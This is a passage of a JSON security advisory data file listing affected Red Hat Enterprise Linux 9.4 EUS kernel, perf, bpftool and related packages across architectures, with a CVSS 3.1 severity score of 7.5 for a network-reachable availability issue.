"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
